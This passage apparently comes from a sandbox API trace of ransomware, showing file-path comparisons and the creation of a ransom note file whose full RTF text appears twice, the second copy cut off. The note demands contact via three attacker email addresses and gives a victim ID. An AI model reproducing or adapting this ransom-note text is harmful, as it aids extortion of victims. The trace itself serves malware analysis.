Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Microsoft Help\\", cchCount1=30, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", cchCount1=110, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 1 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 1 [0139.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\", cchCount2=56) returned 3 [0139.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\", cchCount2=56) returned 1 [0167.591] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\BG85_INFO.rtf" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0168.481] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 